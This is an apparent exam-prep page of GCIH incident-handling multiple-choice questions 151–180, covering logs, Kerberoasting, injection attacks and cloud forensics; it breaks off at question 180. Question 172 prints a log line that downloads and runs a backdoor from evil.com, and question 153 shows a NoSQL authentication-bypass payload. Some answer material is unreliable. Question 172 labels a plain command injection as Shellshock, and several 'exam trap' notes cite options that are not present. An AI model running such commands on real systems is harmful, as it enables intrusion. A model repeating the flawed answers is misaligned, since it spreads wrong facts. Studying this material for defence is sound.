Courseiva

GIAC Certified Incident Handler (GCIH) — Questions 151–225

322 questions total · 5pages · All types, answers revealed

Page 2

Page 3 of 5

Page 4
151
MCQmedium

An incident handler is investigating a suspected data exfiltration on a Windows workstation. The SIEM generated an alert for a large outbound transfer to an unfamiliar IP address. The handler needs to determine which process initiated the connection. Which built-in Windows tool is most appropriate to correlate the active network connection to its owning process?

A.netstat -ano
B.nslookup
C.tracert
D.arp -a
AnswerA

The -ano flags list all connections with their owning process ID (PID) in numeric form. Combined with Task Manager or tasklist, the PID maps directly to the executable, allowing the handler to identify which process initiated the suspicious outbound transfer. This is the fastest native method to correlate a live connection to its process without additional tooling.

Why this answer

Correlating a live network connection to its owning process is a core incident response task. The netstat -ano command provides the essential PID mapping, which can then be resolved to an executable using tasklist or Task Manager. This native capability allows rapid triage without installing additional tools, directly answering which process initiated the suspicious outbound transfer.

Exam trap

The trap here is assuming that DNS or route tracing tools can attribute network activity to a process, when only connection listing tools with PID output can do that.

152
MCQhard

During an investigation of a suspected lateral movement attempt within an Active Directory environment, an incident handler needs to isolate authentication events involving Kerberos ticket-granting service (TGS) requests that indicate potential Kerberoasting activity. Which Windows Security Event Log ID should the analyst examine to identify abnormal requests for service principal names (SPNs) using weak encryption algorithms?

A.Security Event ID 4624
B.Security Event ID 4768
C.Security Event ID 4771
D.Security Event ID 4769
AnswerD

Event ID 4769 is logged for Kerberos service ticket (TGS) requests, recording the account, requested SPN and encryption type. Filtering for weak RC4 encryption and abnormal SPN requests exposes Kerberoasting, where attackers request service tickets to crack service account passwords offline.

Why this answer

Windows Security Event Log ID 4769 is generated whenever a Kerberos service ticket is requested. By filtering for Event ID 4769 and analyzing the encryption type field, analysts can spot requests using older, weaker encryption standards like RC4, which are heavily utilized during offline Kerberoasting password cracking attacks against service accounts.

Exam trap

Many analysts confuse Event ID 4768, which tracks Ticket Granting Ticket (TGT) requests during initial authentication, with Event ID 4769, which tracks Service Ticket (TGS) requests used specifically for Kerberoasting.

153
MCQmedium

An incident handler is investigating a web application that uses a NoSQL database (MongoDB). The attacker sent a request with the parameter 'username[$ne]=admin&password[$ne]=wrong' and successfully authenticated as an administrator. Which of the following BEST describes the attack technique used?

A.SQL injection using MongoDB's SQL compatibility layer
B.Cross-Site Scripting (XSS) through unsanitized input in the login form
C.NoSQL injection via operator injection in MongoDB query selectors
D.LDAP injection exploiting the authentication backend
AnswerC

The attacker injected MongoDB operators ($ne) into the query parameters. The application likely passed the user input directly into a MongoDB query without sanitization, allowing the attacker to alter the query logic. $ne means 'not equal', so the query returns a user where username is not 'admin' and password is not 'wrong', effectively bypassing authentication.

Why this answer

The attacker exploited the application's failure to sanitize user input before incorporating it into a MongoDB query. By injecting the $ne operator, the attacker changed the query to return a user record where the username and password are not equal to the supplied values, bypassing authentication. This is a classic NoSQL injection attack.

Exam trap

The trap here is assuming that any authentication bypass involving special characters is SQL injection, when in fact MongoDB operators indicate a NoSQL injection.

154
MCQhard

A healthcare organization's incident response team is investigating unusual SMB activity on a Windows file server. NetFlow data shows a single internal workstation opened SMB connections to more than 200 distinct hosts on TCP 445 within five minutes, and each connection lasted under two seconds. The workstation's user reports no unusual behavior. Which of the following is the most likely explanation for this traffic pattern?

A.The file server is load-balancing SMB sessions across the network, causing the workstation to reconnect frequently.
B.The workstation is experiencing a DNS misconfiguration causing it to resolve many hostnames to the same server.
C.The workstation is infected with malware performing SMB worm-style lateral movement or network discovery.
D.A legitimate backup application is enumerating shares across the environment.
AnswerC

Hundreds of short-lived TCP 445 connections to many distinct hosts in a brief window is a hallmark of automated SMB scanning or worm propagation. Malware such as ransomware worms enumerate reachable SMB hosts, attempt connections, and move on quickly when they fail or succeed. The user's lack of awareness supports a silent, automated process. This pattern warrants immediate isolation and forensic triage of the workstation.

Why this answer

A single workstation opening TCP 445 connections to over 200 distinct hosts in five minutes, with each session lasting under two seconds, matches automated SMB scanning or worm-style lateral movement. Legitimate backup or load-balancing traffic would be documented, targeted, and longer-lived. The silent nature of the activity and the user's unawareness reinforce malware as the likely cause, so the host should be isolated and examined.

Exam trap

The trap here is dismissing the pattern as benign network discovery or backup activity because the user reports nothing unusual, when the breadth and speed of short-lived SMB connections indicate automated malicious scanning.

155
MCQmedium

Which security principle is most directly violated when an organization allows guest access to sensitive SMB file shares?

A.Defense in depth
B.Least privilege
C.Availability
D.Non-repudiation
AnswerB

Guest access grants everyone on the network the ability to access data, which is the definition of excessive privilege. Following the principle of least privilege requires that every access request be authenticated and authorized, ensuring that only those with a specific need can access the organization's sensitive file shares.

Why this answer

Allowing guest access to SMB shares fundamentally violates the principle of least privilege, which dictates that users should only be granted access to the specific resources required for their role. By enabling guest access, the organization removes authentication requirements, allowing anyone with network access to view or modify sensitive files. This creates a significant security gap, as it bypasses authorization controls and increases the risk of unauthorized data exposure or malicious file modification.

Exam trap

Candidates often choose 'Lack of Authentication' or 'Insecure Configuration' because they describe the situation, but they fail to identify 'Least Privilege' as the specific security principle being violated by excessive access.

156
MCQmedium

You are performing a live response and encounter a suspicious process. Which action should you take FIRST to gather the most intelligence without alerting the adversary or crashing the system?

A.Take a forensic image of the hard drive using a hardware write-blocker.
B.Capture volatile data, including process listings, open handles, and network connections.
C.Power down the system immediately to preserve the current state.
D.Run an antivirus scan to identify and delete the malicious process.
AnswerB

Capturing volatile data is the priority because it is the most ephemeral evidence. By using memory acquisition tools, you can identify what the attacker is doing in real-time, such as open network sockets or injected threads, which are essential for understanding the scope of the current incident.

Why this answer

In live response, the principle of 'least intrusive first' is paramount. Collecting volatile data (like process lists and network connections) should always precede disk-based forensic imaging. By capturing the state of the system first, you ensure that you obtain the memory-resident artifacts that would be lost upon a reboot or power-down, providing the best foundation for a successful analysis.

Exam trap

Candidates often jump to disk imaging or memory dumps. They fail to prioritize volatile data like network connections and process lists, which are easily lost and provide immediate, low-impact context.

157
MCQmedium

Which of the following is a reliable method to detect an adversary using 'WMI Event Subscription' for persistence?

A.Monitoring for new files in the Startup folder.
B.Auditing WMI event filters and consumers for anomalies.
C.Blocking all PowerShell execution at the kernel level.
D.Scanning the Windows Registry for Run keys.
AnswerB

Attackers leverage the WMI event subsystem by creating a filter (the trigger) and a consumer (the action). Manually inspecting these WMI objects for suspicious commands or scripts is the only reliable way to identify this persistence method, as it does not rely on traditional file-based startup locations.

Why this answer

WMI event subscriptions allow attackers to trigger malicious code execution upon specific system events, such as system startup or a timer. Because WMI is a legitimate administrative interface, malicious subscriptions are often overlooked. Detection requires auditing WMI repositories for suspicious 'ActiveScriptEventConsumer' or 'CommandLineEventConsumer' entries, which are the primary mechanisms used to run code through the WMI system for long-term persistence.

Exam trap

Candidates often look for generic PowerShell execution or registry run keys, forgetting that WMI uses specialized database repositories and distinct event classes like ActiveScriptEventConsumer for persistence.

158
Multi-Selectmedium

During an incident response engagement involving a web application, an analyst uncovers evidence of Command Injection. Which TWO indicators or technical conditions strongly support this specific finding? (Choose TWO)

Select 2 answers
A.Presence of shell metacharacters like pipes, ampersands, or semicolons within HTTP parameter values
B.Database error logs displaying syntax violations from unmatched table column counts
C.Web server worker processes spawning unexpected child processes like cmd.exe or /bin/sh
D.Application configuration files storing plaintext database connection passwords
E.Client-side DOM manipulation errors logged within browser developer console windows
AnswersA, C

Shell metacharacters allow attackers to chain multiple commands together in a single execution stream. Observing characters like pipes or semicolons in web server access logs strongly indicates an attempt to break out of intended application logic into the shell.

Why this answer

Command injection occurs when untrusted user input is passed directly to operating system shell interpreters via functions like system() or popen(). Analysts look for shell metacharacters such as pipes or semicolons in access logs alongside process creation anomalies indicating spawned subprocesses.

Exam trap

Candidates often select 'high CPU usage' or 'network latency'. These are generic performance issues, not specific indicators of command injection, which requires evidence of shell interaction or unexpected process spawning.

159
MCQhard

A red team operator is using a cloud-hosted LLM API to help draft PowerShell commands for a post-exploitation task. The operator wants to prevent the LLM provider from retaining the prompts for model training or later law-enforcement requests. Which configuration or contractual control should the operator verify FIRST?

A.Enable a zero-data-retention (ZDR) setting or equivalent no-retention agreement with the LLM provider.
B.Enforce TLS 1.3 with certificate pinning for all API calls to the provider.
C.Hash the PowerShell commands before sending them and ask the LLM to reconstruct them from the hashes.
D.Scope the API key to a dedicated project with minimal permissions and rotate it every 24 hours.
AnswerA

A zero-data-retention setting or contractually binding no-retention agreement prevents the provider from storing prompts and completions beyond the immediate request, which directly addresses the operator's concern about later training use or legal disclosure. Without this control, other technical measures such as TLS or token scoping do not stop the provider from logging the content, so verifying retention terms first is the correct priority.

Why this answer

The operator's specific requirement is to stop the provider from retaining prompts for training or later legal requests. A zero-data-retention setting or equivalent contractual no-retention agreement is the control that directly changes provider-side storage behavior, making it the correct first check. Transport encryption, key scoping, and hashing do not alter what the provider stores after receiving the request, so they fail to satisfy the stated objective.

Exam trap

The trap here is assuming that encrypting the API traffic or limiting API key permissions prevents the LLM provider from retaining the prompt content.

160
MCQeasy

A security analyst notices that a web application reflects user-supplied input directly into an HTML attribute without encoding. An attacker crafts a URL that, when clicked by a victim, causes the victim's browser to execute a script that reads the victim's session cookie and sends it to an attacker-controlled server. Which type of attack is this?

A.Cross-Site Request Forgery (CSRF)
B.Stored Cross-Site Scripting (XSS)
C.Clickjacking
D.Reflected Cross-Site Scripting (XSS)
AnswerD

Reflected XSS occurs when user input is immediately returned by the web application in an error message, search result, or other response without proper encoding. The script executes in the victim's browser when they click the crafted URL. The theft of session cookies is a common impact. This matches the scenario exactly: input reflected into an HTML attribute, script execution, and cookie exfiltration.

Why this answer

The attack reflects user input into an HTML attribute without encoding, causing script execution in the victim's browser when they click a crafted link. This is reflected XSS. The immediate execution and cookie theft are characteristic.

Incident responders should validate input, apply context-aware output encoding, and consider Content Security Policy to mitigate such attacks.

Exam trap

The trap here is confusing reflected XSS with stored XSS by overlooking that the payload is delivered via a URL and not persisted on the server.

161
MCQmedium

An API uses OAuth 2.0. An attacker sends a request with a modified 'redirect_uri' parameter to an authorization endpoint. If successful, this could lead to which type of vulnerability?

A.Denial of Service
B.Cross-Site Request Forgery
C.Authorization Code Interception
D.Server-Side Request Forgery
AnswerC

By modifying the redirect_uri to an attacker-controlled endpoint, the authorization server redirects the user's browser with the authorization code sent to the attacker. The attacker then exchanges this code for a valid access token, bypassing standard authentication flows and gaining full access to the victim's account.

Why this answer

Manipulating the 'redirect_uri' in an OAuth flow is a classic technique to facilitate Authorization Code Interception. By changing the URI to a domain under the attacker's control, the attacker can cause the authorization server to send the sensitive authorization code to them instead of the legitimate client application, enabling them to exchange the code for an access token and impersonate the user.

Exam trap

Students often select generic Cross-Site Request Forgery (CSRF) instead of the specific OAuth attack vector involving authorization code interception via redirect URI manipulation.

162
Multi-Selectmedium

A financial services company is hardening a REST API that returns account statements. Each request includes a numeric `accountId`, and the API currently returns the statement whenever the `accountId` exists. The security team wants to close the insecure direct object reference exposure without redesigning the data model. Which two controls, applied together, most directly address the flaw? (Choose two.)

Select 2 answers
A.Increase the account identifier length from six digits to a random 128-bit value so that account numbers cannot be enumerated.
B.Require TLS 1.3 with mutual authentication between the mobile client and the API gateway for every statement request.
C.Derive the account identifier from the authenticated session context instead of trusting the client-supplied `accountId`.
D.After resolving the requested account, verify that the authenticated user is an owner or authorized delegate of that account before returning the statement.
E.Log every statement request with the account identifier and alert when a single session requests more than one distinct account.
AnswersC, D

When the server resolves the account from the session rather than the request body or query string, the client cannot name an object it does not own. This removes the attacker's ability to substitute another account number. It is a direct structural fix for the reference flaw because the object selection is bound to the authenticated principal before any data is returned.

Why this answer

The exposure exists because the API trusts a client-supplied identifier and never checks entitlement. Binding the account to the authenticated session removes the attacker's ability to name arbitrary objects, and an explicit ownership or delegation check catches legitimate cases where identifiers must be supplied. Together these enforce object-level authorization on every request, which is the durable fix for insecure direct object references.

Exam trap

The trap here is treating identifier randomization or transport security as an authorization control, when neither prevents an authenticated user from naming and retrieving an object they do not own.

163
MCQhard

An incident responder is analyzing a potential compromise of an AWS environment. The attacker gained access to an EC2 instance and then used the instance's IAM role to call the AWS Security Token Service (STS) AssumeRole API to obtain credentials for a role in another account. The attacker then used those credentials to access sensitive data. Which AWS service or feature would provide the most detailed log of the AssumeRole API call, including the identity of the caller and the target role?

A.AWS Config configuration history
B.Amazon VPC Flow Logs
C.AWS CloudTrail management events
D.Amazon GuardDuty findings
AnswerC

CloudTrail management events log all API calls that control AWS resources, including STS AssumeRole. The log entry includes the identity of the caller (the EC2 instance role), the target role, the requested session name, and the source IP address. This provides the most detailed record for tracing the cross-account role assumption. CloudTrail is the primary audit service for API activity in AWS.

Why this answer

CloudTrail management events capture all API calls, including STS AssumeRole, with details such as the caller's identity, the target role, the session name, and the source IP. This makes it the most detailed log for tracing cross-account role assumption. VPC Flow Logs, AWS Config, and GuardDuty findings either lack API-level detail or are not designed for forensic auditing of individual API calls.

Exam trap

The trap here is assuming that GuardDuty findings provide the granular API details needed for forensics, when they are actually high-level alerts that require CloudTrail for full context.

164
MCQmedium

An incident responder is preparing to collect volatile evidence from a compromised Windows server that is still running. Which order of collection best preserves the most perishable data?

A.Event logs, then memory, then disk
B.Registry hives, then disk image, then memory
C.Memory, then network connections and process state, then disk
D.Disk image first, then memory, then network connections
AnswerC

Memory contains the most perishable evidence, including running processes, network connections, and cryptographic material. Capturing memory first, followed by live network and process state, then the disk, follows the order of volatility. This preserves data that would be lost or altered if the system were imaged or shut down first.

Why this answer

The order of volatility dictates that the most transient data be captured first. Memory holds active processes, network connections, and keys that vanish on shutdown. Capturing memory, then live network and process state, and finally the disk preserves the evidence most likely to be lost.

This sequence reflects standard incident response practice for live systems.

Exam trap

The trap here is prioritizing disk or log artifacts because they are familiar, when the order of volatility requires memory and active network state to be captured before persistent storage.

165
MCQmedium

Which tool is best suited for identifying potentially misconfigured SMB services that could be leveraged for lateral movement within a compromised Windows environment?

A.Wireshark
B.Nmap with NSE scripts
C.Netcat
D.Tcpdump
AnswerB

Nmap is a versatile scanner that, when combined with NSE scripts, can detect specific SMB-related vulnerabilities and configurations. This allows the responder to map the network and verify the security posture of Windows-based machines, identifying potential weak points that could be exploited to gain unauthorized access or move laterally across the network.

Why this answer

Nmap's scripting engine (NSE) provides dedicated scripts like 'smb-vuln*' that can scan for specific vulnerabilities such as MS17-010. By integrating these scripts directly into the scanning workflow, responders can quickly map the attack surface and identify high-value targets for lateral movement without switching tools, ensuring a cohesive and efficient assessment of the environment's configuration security.

Exam trap

Candidates mistakenly choose general-purpose vulnerability scanners or packet analyzers, overlooking tools specifically built with extensible scripting engines for SMB enumeration.

166
MCQmedium

An analyst discovers a suspicious file named 'svchost.exe' running from a user's 'AppData' directory. Why is this highly suspicious?

A.It is always a virus.
B.Svchost must always run as SYSTEM.
C.Legitimate svchost.exe resides in System32.
D.Svchost cannot be executed by users.
AnswerC

The actual Windows svchost.exe binary is located in C:\Windows\System32. When an executable with the same name is found in a user's AppData directory, it is almost certainly a malicious attempt to hide in plain sight while maintaining persistence, which is a classic indicator of compromise.

Why this answer

The legitimate svchost.exe process is a core Windows system component that resides in the System32 directory and is launched by the Service Control Manager. It is designed to host multiple Windows services. Attackers often rename their malicious binaries to 'svchost.exe' to blend in with legitimate processes, but they rarely place them in user-writable directories like AppData.

Detecting this is a key indicator of malware masquerading as system processes.

Exam trap

Candidates assume svchost.exe running from any folder is legitimate because it is a known Windows binary, ignoring the importance of execution path context.

167
MCQmedium

A security analyst is reviewing access to a cloud-based file storage service. The organization uses SAML-based single sign-on (SSO) with an external identity provider (IdP) for authentication. The analyst notices that some users are still able to access the file storage service using their old username and password, even after SSO was enforced. Which of the following is the MOST likely cause?

A.The identity provider is not configured to send the correct user attributes.
B.The SAML assertion is not properly signed, allowing users to forge authentication.
C.The service's local authentication is still enabled, allowing users to bypass SSO.
D.The users have cached credentials in their browsers that bypass SSO.
AnswerC

If the cloud service still allows local username and password authentication, users can continue to log in directly, bypassing SSO. To enforce SSO, the service's local authentication must be disabled. This is a common misconfiguration when transitioning to SSO. The analyst should verify the service's authentication settings and disable any non-SSO login methods.

Why this answer

The most likely cause is that the service's local authentication remains enabled, permitting users to log in with their old credentials. Enforcing SSO requires disabling all other authentication methods. The other options either do not explain the use of old credentials or are less likely given the scenario.

The analyst should check and disable local authentication.

Exam trap

The trap here is focusing on SAML misconfigurations or cached credentials, when the simple explanation is that local authentication was never disabled, allowing users to bypass SSO entirely.

168
MCQmedium

An incident responder analyzes a web application log and discovers that an attacker successfully extracted database schema names by manipulating a parameter where the application dynamically constructs SQL statements. The database error messages returned verbose structural details. Which remediation strategy provides the most robust defense against this injection vector while maintaining application functionality?

A.Implement client-side JavaScript validation checks to strip dangerous SQL characters before submission.
B.Configure the web application firewall to block requests containing common SQL keywords like UNION and SELECT.
C.Refactor the data access layer to utilize parameterized queries and prepared statements exclusively.
D.Disable verbose database error messages globally to prevent attackers from viewing schema details.
AnswerC

Parameterised queries and prepared statements separate SQL code from user-supplied data, so manipulated parameters are treated as values rather than executable syntax. This eliminates the injection vector at its root while preserving full query functionality, unlike input filtering or error suppression.

Why this answer

Parameterized queries decouple user-supplied input from the SQL command structure, ensuring the database engine interprets data strictly as parameters rather than executable code. This eliminates SQL injection vulnerabilities at the architectural level, regardless of input complexity or encoding techniques, protecting the underlying database management system from unauthorized data access and structural enumeration.

Exam trap

Candidates often choose input sanitization or regex filtering because they seem faster to implement, forgetting that blacklist filters can be bypassed with clever encoding or alternative syntax structures.

169
MCQmedium

A web application serves user-uploaded documents through a request to `/api/v1/documents/{docGuid}`. The `docGuid` is a version 4 UUID that appears unguessable, and the API returns the document for any authenticated user who supplies a valid GUID. During an incident-handling review, you note that the GUID is also exposed in a public activity feed that lists recent uploads. What is the most significant reference-handling weakness in this design?

A.The API should hash each GUID with SHA-256 before returning it so that clients cannot correlate documents.
B.The version 4 UUID does not contain a timestamp, so the application cannot determine when the document was created.
C.The application relies on the UUID's unguessability for authorization instead of verifying that the requesting user owns the document.
D.The activity feed should use a POST request instead of a GET request to hide the GUIDs from intermediaries.
AnswerC

Unpredictable identifiers are not an access control mechanism. Because the API never checks ownership, any authenticated user who obtains a GUID from the public activity feed can retrieve another user's document. This is the defining property of an insecure direct object reference: the object reference itself functions as the authorization decision, which breaks as soon as the reference leaks.

Why this answer

The API treats the document GUID as a bearer credential for the object. Because the GUID is disclosed in a public feed, any authenticated user can collect references and retrieve documents belonging to others. Secure designs must resolve the reference to an object and then verify the authenticated principal is entitled to it, rather than assuming an unguessable identifier is sufficient protection.

Exam trap

The trap here is assuming that a random, unguessable identifier such as a version 4 UUID is itself a security control that prevents insecure direct object reference attacks.

170
MCQhard

A responder needs to map an internal network but cannot use standard tools due to strict endpoint protection. Which technique can be used with native command-line tools to perform a basic port check on a remote host?

A.Using a PowerShell Test-NetConnection command.
B.Running an nmap.exe binary from a USB drive.
C.Initiating a telnet session to every port.
D.Pinging the broadcast address of the subnet.
AnswerA

Test-NetConnection is a native Windows cmdlet that functions similarly to a simplified port scanner. It is an ideal, low-profile method for checking connectivity and port status on Windows systems. Because it is a built-in utility, it is less likely to be flagged by behavioral detection systems than external scanning tools.

Why this answer

Using native tools like PowerShell or Netcat allows for basic network verification when dedicated scanning tools are blocked by endpoint security suites. By leveraging built-in functionality such as Test-NetConnection in PowerShell, a responder can verify reachability and port status without introducing unauthorized binaries, thereby maintaining the integrity of the environment while still performing necessary incident response data gathering.

Exam trap

Candidates often suggest installing third-party tools like Netcat or Nmap on a restricted host. This violates security policies and triggers endpoint detection; using native built-in commands is the only compliant path.

171
MCQhard

An attacker has compromised a host and established persistence using a malicious scheduled task that executes an encoded PowerShell command. The command downloads a second-stage payload from a legitimate cloud storage service. Your AI-assisted EDR has flagged the activity but provided only a low-confidence alert. As the incident responder, you need to determine the next investigative step. Which of the following actions is MOST likely to yield actionable intelligence about the second-stage payload?

A.Immediately isolate the host and rebuild it from a known-good image.
B.Decode the PowerShell command and extract the URL to retrieve the payload for analysis.
C.Review the scheduled task's XML definition to identify the author and creation time.
D.Run a full antivirus scan on the host to detect and remove the second-stage payload.
AnswerB

Decoding the PowerShell command reveals the exact URL used to download the second-stage payload. Retrieving and analyzing that payload in a sandbox will provide details about its capabilities, C2 infrastructure, and potential indicators. This directly advances the investigation by obtaining the actual malware for further study, rather than relying on low-confidence alerts.

Why this answer

Decoding the PowerShell command and retrieving the payload is the most direct way to gain intelligence. It allows you to analyze the malware, extract IOCs, and understand the attack chain. Other options either destroy evidence, are unlikely to detect the payload, or provide limited context.

Exam trap

The trap here is focusing on containment or scanning without first extracting and analyzing the payload, which is essential for understanding the threat and preventing recurrence.

172
MCQhard

A security incident responder is analyzing a web server compromise. The attacker gained initial access through a vulnerable web application and then executed a command to download a tool from a remote server. The responder finds the following in the web server logs: `GET /cgi-bin/printenv?QUERY_STRING=%3Bwget%20http%3A%2F%2Fevil.com%2Fbackdoor%20-O%20%2Ftmp%2Fbd%3Bchmod%20%2Bx%20%2Ftmp%2Fbd%3B%2Ftmp%2Fbd`. The responder needs to identify the specific technique used and the appropriate containment step. Which of the following best describes the technique and the immediate containment action?

A.Cross-site scripting; sanitize the `QUERY_STRING` parameter and notify users of potential cookie theft.
B.Insecure Direct Object Reference; change the object references in the application and implement access controls.
C.SQL injection; review database logs and apply input validation to the `QUERY_STRING` parameter.
D.Shellshock exploitation; isolate the server by removing it from the network and preserve volatile evidence before patching Bash.
AnswerD

The payload exploits the Shellshock vulnerability (CVE-2014-6271) in the `printenv` CGI script. The `QUERY_STRING` contains a semicolon followed by commands, which are executed by the vulnerable Bash. The immediate containment is to isolate the server to prevent further compromise, preserve volatile evidence (memory, network connections), and then patch Bash.

Why this answer

The log entry shows a Shellshock exploit against the `printenv` CGI script, where commands in the `QUERY_STRING` are executed by Bash. The immediate containment is to isolate the server to prevent lateral movement, preserve volatile evidence, and then patch the Bash vulnerability. The other options misidentify the attack as SQL injection, XSS, or IDOR, none of which involve shell command execution.

Exam trap

The trap here is misinterpreting the semicolon-separated commands as SQL injection when they are actually shell commands executed by a vulnerable CGI script.

173
MCQmedium

An analyst discovers a malicious DLL file in a system directory. What is the most effective way to identify which process loaded this DLL into memory?

A.Search the file system for other files with similar names.
B.Examine the Windows Event Logs for file creation events.
C.Use memory forensics tools to inspect loaded modules per process.
D.Check the registry for new service installation entries.
AnswerC

Memory forensics tools like Volatility or Rekall can enumerate the loaded DLLs for every running process. This is the only reliable way to confirm which process is actively utilizing the malicious library, allowing the investigator to link the malicious file to the specific process being exploited or controlled.

Why this answer

Identifying the process that loaded a malicious DLL is fundamental for understanding the scope of the compromise. Memory forensic tools can map loaded modules to specific process IDs (PIDs). This is critical because it allows the handler to identify whether the DLL is being used for process injection, persistence, or credential theft, providing the necessary evidence to isolate and remediate the affected processes immediately.

Exam trap

Candidates often suggest scanning the file system or checking file hashes, which fails to reveal how the malicious DLL was injected or which specific process is currently utilizing it in memory.

174
MCQmedium

During an incident response investigation, you need to identify all hosts on a subnet that are responding to ARP requests. You have administrative access to a Linux workstation on the same subnet and want to use Nmap to perform this discovery without sending any IP packets. Which Nmap option should you use?

A.-PS
B.-PE
C.-PR
D.-PA
AnswerC

The -PR option enables ARP ping, which sends ARP requests to discover hosts on the local Ethernet subnet. It is the default discovery method for local targets and does not send IP packets. This is ideal for identifying live hosts on the same subnet quickly and reliably, as ARP is rarely filtered.

Why this answer

The -PR option performs ARP ping, which sends ARP requests to discover hosts on the local subnet. ARP operates at layer 2 and does not use IP packets, satisfying the requirement. It is also the most reliable method on a local Ethernet segment because hosts must respond to ARP to communicate.

The other options all send IP packets (ICMP, TCP SYN, or TCP ACK) and are not ARP-based.

Exam trap

The trap here is assuming that any ping scan uses ARP; only -PR explicitly enables ARP ping, while other discovery probes use IP packets.

175
MCQmedium

Which of the following is a sign of 'Domain Fronting' in network traffic logs?

A.A mismatch between the SNI and the internal HTTP Host header.
B.Large volumes of traffic to a single domain over port 443.
C.Unusually slow download speeds for legitimate files.
D.Repeated failed authentication attempts to the CDN.
AnswerA

In domain fronting, the SNI (Server Name Indication) presented in the TLS handshake belongs to a reputable CDN, but the actual HTTP request inside the encrypted stream contains a different Host header. Detecting this mismatch is the most reliable way to identify domain fronting activity in proxy logs.

Why this answer

Domain fronting uses high-reputation domains (like CDNs) to hide the true destination of malicious traffic. The initial request looks like it is going to a trusted domain, but the HTTP Host header inside the encrypted tunnel points to the attacker's server. Detecting this requires deep packet inspection or analysis of SSL/TLS metadata, which is critical for identifying covert C2 channels that masquerade as legitimate web traffic.

Exam trap

Candidates look for mismatched source and destination IP addresses, failing to notice the critical discrepancy between the external SNI and the internal HTTP Host header.

176
MCQeasy

An incident handler is documenting an intrusion in which the attacker used a locally hosted LLM to summarize harvested credentials and prioritize lateral movement targets. The handler wants to cite the model's activity in the report but must avoid presenting model output as established fact. Which approach best meets that requirement?

A.Omit the LLM activity entirely because model output cannot be treated as reliable evidence in an incident report.
B.Reproduce the attacker's prompts against the same model build and label the resulting summaries as analytical reconstructions rather than confirmed attacker statements.
C.Attribute the summaries to the incident handler's own analysis so the report reads as a single consistent narrative.
D.Present the model's summaries verbatim as the attacker's own conclusions, since the model output was recovered from the host.
AnswerB

Re-running the same prompts on the same model build lets the handler show what the attacker likely saw while clearly labeling it as a reconstruction. This distinguishes inference from evidence and avoids asserting that unrecovered model output was fact. It preserves analytical value in the report without overstating certainty, which is the standard the scenario demands.

Why this answer

When attacker tooling includes an LLM, the handler's job is to distinguish observed artifacts from reconstructed inference. Re-running the same prompts on the same model build and labeling the output as a reconstruction preserves analytical insight while avoiding the claim that model output equals attacker intent. Verbatim attribution, omission, and false attribution all distort the record in different ways.

Exam trap

The trap here is equating recovered model output with the attacker's confirmed reasoning, when the model may have hallucinated and the handler did not observe the attacker acting on it.

177
MCQhard

During an incident response engagement, an analyst observes that a Windows workstation is making DNS queries for a domain that resolves to an IP address owned by a cloud provider. The queries are for subdomains that appear randomly generated and change frequently. The workstation also has periodic HTTPS connections to that IP. The analyst suspects domain fronting. Which of the following best describes how domain fronting is used in this scenario?

A.The attacker sends traffic to a legitimate domain's IP but uses a different Host header to reach the actual command-and-control server.
B.The attacker compromises a legitimate website and uses it to host malicious payloads.
C.The attacker uses a fast-flux network to rapidly change DNS records and evade detection.
D.The attacker uses DNS tunneling to exfiltrate data through the DNS queries.
AnswerA

Domain fronting exploits the difference between the DNS name and the HTTP Host header. The client connects to a legitimate domain's IP (the front), but the Host header specifies the actual malicious domain. The front server, often a CDN, routes the request based on the Host header. This allows the attacker to blend in with traffic to a reputable domain, bypassing network filters.

Why this answer

Domain fronting allows an attacker to hide command-and-control traffic by connecting to a legitimate domain's IP address while specifying a different Host header that routes to the attacker's server. This makes the traffic appear to go to a trusted domain, evading network filters. The random subdomains and periodic HTTPS connections are consistent with this technique.

Exam trap

The trap here is assuming that random DNS queries and HTTPS traffic indicate DNS tunneling or fast-flux, when the defining characteristic of domain fronting is the use of a legitimate front domain with a mismatched Host header.

178
MCQhard

An AI-assisted investigation tool summarizes a week of EDR telemetry and reports that a workstation 'likely performed credential dumping.' The summary cites no specific process, command line, or timestamp. What should the incident handler do first?

A.Escalate to management and legal teams because credential dumping implies a reportable breach.
B.Retrain or tune the AI model because its summary lacks supporting detail.
C.Query the underlying EDR data for LSASS access events and suspicious process lineage to validate the AI claim.
D.Isolate the workstation immediately to prevent lateral movement.
AnswerC

The AI summary is an unverified inference, so the handler must pivot to the raw EDR telemetry that the model used. Searching for LSASS handle requests, known dumping tools like Mimikatz or ProcDump, and unusual parent-child process relationships provides concrete evidence. This validation step confirms or refutes the claim and produces the specific artifacts needed for escalation and containment decisions.

Why this answer

AI-generated summaries are inferences that must be validated against source telemetry before action. The handler should query EDR for LSASS access, known credential dumping tool indicators, and suspicious process ancestry to confirm or refute the claim. This produces concrete evidence for escalation and avoids both unnecessary containment and missed detection.

Validation is the foundational step in any AI-assisted investigation.

Exam trap

The trap here is treating an AI summary as a confirmed finding and acting on containment or escalation without validating the underlying telemetry.

179
MCQmedium

An incident responder is examining a compromised Windows 10 workstation that an attacker used to pivot into the internal network. The responder runs `netstat -ano` and sees an established connection from the workstation to an internal server on TCP port 445, but no user has mapped a drive or accessed a share. Which of the following Windows artifacts would BEST reveal the remote service or process that initiated this SMB connection?

A.Windows Security event ID 4624 with logon type 3
B.Security event ID 5140 (network share object was accessed)
C.Sysmon Event ID 3 (network connection detected)
D.Prefetch file for the executable that made the connection
AnswerC

Sysmon Event ID 3 logs network connections with the source and destination IP addresses, ports, and the Image (process) that initiated the connection. On the compromised workstation, this event would directly tie the SMB connection to a specific executable or service, such as a malicious binary or a living-off-the-land tool. This is the most direct artifact to identify the remote service or process that created the connection.

Why this answer

Sysmon Event ID 3 captures network connection events with the initiating process image, source and destination IPs, and ports. On the compromised workstation, this event directly links the SMB connection to a specific executable or service, which is exactly what the responder needs. Other artifacts either reside on the remote server, lack process context, or do not record network activity.

Exam trap

The trap here is assuming that Windows Security event logs alone will identify the process behind a network connection, when in fact process-level network attribution requires Sysmon or similar telemetry.

180
MCQeasy

An incident handler is investigating a suspected compromised Windows workstation. They review Windows Security event logs and notice a large number of Event ID 4625 (An account failed to log on) followed by a single Event ID 4624 (An account was successfully logged on) from the same source IP within a short period. Which of the following best describes the activity?

A.A user mistyped their password several times before logging in successfully.
B.A successful brute-force attack against a user account.
C.A password-spraying attack targeting multiple accounts.
D.An account lockout policy being triggered and then reset.
AnswerB

Multiple failed logon attempts (4625) followed by a success (4624) from the same source IP is the classic pattern of a brute-force attack. The attacker tried many passwords until one worked. This is a common technique for gaining initial access. The short timeframe indicates automated tools. Therefore, this best describes the activity.

Why this answer

